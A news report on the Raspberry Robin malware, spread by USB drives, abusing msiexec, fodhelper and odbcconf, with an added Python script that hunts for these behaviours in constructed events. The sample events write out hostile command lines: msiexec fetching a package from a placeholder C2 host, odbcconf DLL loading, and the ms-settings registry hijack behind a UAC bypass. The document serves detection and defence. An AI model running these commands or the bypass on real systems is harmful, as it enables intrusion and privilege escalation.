New strain of malicious code detected that abuses Windows Installer to spread infections
The malicious code, dubbed Raspberry Robin, has so far been found on the networks of a number of organizations and businesses worldwide, mainly in the technology and manufacturing sectors.
Preliminary findings from Red Canary show that Raspberry Robin reaches Windows systems through an infected USB drive that carries a malicious .LNK file. Once the drive is attached, the shortcut starts a new cmd.exe process, which launches a malicious file stored on the drive itself.
Raspberry Robin abuses the Microsoft Standard Installer (msiexec.exe) to reach its command and control (C2) servers. The malicious code is likely hosted on compromised QNAP devices, with TOR exit nodes used as additional C2 infrastructure.
"While msiexec.exe downloads and executes legitimate installer packages, malicious actors also leverage it to distribute malicious code. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for command and control purposes," Red Canary said.
The team suspects that Raspberry Robin installs a malicious DLL on compromised systems so that it survives across reboots. It launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing optional features in Windows Settings) and odbcconf (a tool for configuring ODBC drivers). fodhelper lets the malicious code bypass User Account Control (UAC), while odbcconf is used to execute and configure the DLL.
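The infection chain described above (a .LNK on the USB drive spawning cmd.exe, msiexec.exe reaching out to an external domain, fodhelper for the UAC bypass, odbcconf to load the DLL) lends itself to a handful of endpoint hunting rules. The Python below is an added example written for this page, not Red Canary's code or detection content from the article: it runs simple rules over constructed process-creation and registry events in a Sysmon-like shape. Assumptions: the field names, sample command lines, the domain `c2.example`, the drive letter `E:` and the DLL path are invented; the registry path checked for the fodhelper bypass (the per-user `ms-settings\Shell\Open\command` handler) is the publicly documented mechanism of that bypass and is not stated on the page; the non-system-drive heuristic assumes the OS lives on `C:`.

```python
# Added hunting example for the Raspberry Robin behaviours described above.
# Not Red Canary's code; every sample event below is constructed, not real telemetry.
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SYSTEM_DRIVE = "C:"  # assumption: the OS volume; removable media gets another letter
URL_RE = re.compile(r"https?://[\w.:/%-]+", re.IGNORECASE)
DRIVE_RE = re.compile(r"\b([A-Za-z]):\\")
# Registry path behind the public fodhelper UAC bypass (not stated on the page):
# a per-user ms-settings protocol handler that auto-elevated fodhelper.exe honours.
MS_SETTINGS_HANDLER = r"\software\classes\ms-settings\shell\open\command"


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


@dataclass
class RegEvent:
    image: str          # process writing the value
    target_object: str  # full registry path written


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_proc(ev: ProcEvent) -> List[str]:
    """Names of the hunting rules a single process-creation event trips."""
    img, parent, cl = _basename(ev.image), _basename(ev.parent_image), ev.command_line
    hits: List[str] = []
    # Stage 1: the .LNK on the USB drive makes explorer.exe spawn cmd.exe, which
    # reads or launches a file from the drive itself instead of the OS volume.
    if img == "cmd.exe" and parent == "explorer.exe":
        drives = {m.group(1).upper() + ":" for m in DRIVE_RE.finditer(cl)}
        if drives - {SYSTEM_DRIVE.upper()}:
            hits.append("cmd_from_explorer_touches_non_system_drive")
    # Stage 2: msiexec.exe given a URL as its package source; Windows Installer
    # fetches and runs it, which is how the sample contacts its C2 domain.
    if img == "msiexec.exe" and URL_RE.search(cl):
        hits.append("msiexec_remote_package_url")
    # Stage 3a: odbcconf.exe's regsvr action loads a DLL and calls its
    # DllRegisterServer export: DLL execution under a signed Microsoft binary.
    if img == "odbcconf.exe" and re.search(r"regsvr", cl, re.IGNORECASE):
        hits.append("odbcconf_regsvr_dll_execution")
    # Stage 3b: fodhelper.exe auto-elevates and normally spawns nothing itself;
    # a child process is the usual tell of the UAC bypass (heuristic).
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child_process")
    return hits


def check_reg(ev: RegEvent) -> List[str]:
    """Flag the per-user ms-settings handler hijack that precedes the fodhelper run."""
    return ["ms_settings_handler_hijack"] if MS_SETTINGS_HANDLER in ev.target_object.lower() else []


def hunt(procs: List[ProcEvent], regs: List[RegEvent]) -> Dict[Tuple[str, int], List[str]]:
    """Map ("proc"|"reg", index in input) to the rules that event tripped."""
    findings: Dict[Tuple[str, int], List[str]] = {}
    for i, ev in enumerate(procs):
        hits = check_proc(ev)
        if hits:
            findings[("proc", i)] = hits
    for i, ev in enumerate(regs):
        hits = check_reg(ev)
        if hits:
            findings[("reg", i)] = hits
    return findings


# Constructed sample events (hypothetical paths, domain and drive letter).
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /R cmd < E:\Setup\installer.cmd"),                      # stage 1
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /q /i http://c2.example:8080/pkg.msi"),                 # stage 2
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\odbcconf.exe",
              r"odbcconf /a {REGSVR C:\ProgramData\u.dll}"),                    # stage 3a
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c odbcconf /a {REGSVR C:\ProgramData\u.dll}"),         # stage 3b
    # Benign look-alikes that must not fire
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\alice\build.bat"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\alice\Downloads\setup.msi"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\odbcconf.exe",
              r'odbcconf /a {CONFIGSYSDSN "SQL Server" "DSN=payroll"}'),
]
SAMPLE_REGS = [
    RegEvent(r"C:\Windows\System32\reg.exe",
             r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"),
    RegEvent(r"C:\Windows\explorer.exe",
             r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"),
]

if __name__ == "__main__":
    for key, rules in sorted(hunt(SAMPLE_PROCS, SAMPLE_REGS).items()):
        print(key, rules)
```

In practice these rules would be fed Sysmon event ID 1 (process creation) and ID 13 (registry value set) or equivalent EDR telemetry. The msiexec and odbcconf rules are sharp: a URL as the package argument or a regsvr action is rare in legitimate administration. The cmd.exe and fodhelper rules are heuristics that will need tuning against an environment's baseline before they are used for alerting rather than hunting.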
Although Red Canary has examined the infected systems closely, several questions remain open.
First and foremost, the researchers have yet to determine how or where Raspberry Robin infects the external drives that keep it spreading. While this could in theory happen in an offline environment, they consider the odds low.
"We also don't know why Raspberry Robin installs a malicious DLL," the Red Canary researchers said. "One theory is that this could be an attempt by the malicious code to establish persistence on an infected system. However, additional information will be needed to build confidence in that hypothesis."
Since nothing is yet known about what Raspberry Robin does in its later stages, one more question remains: what is the real goal of the operators behind the malicious code? These are puzzles the researchers will have to clarify step by step.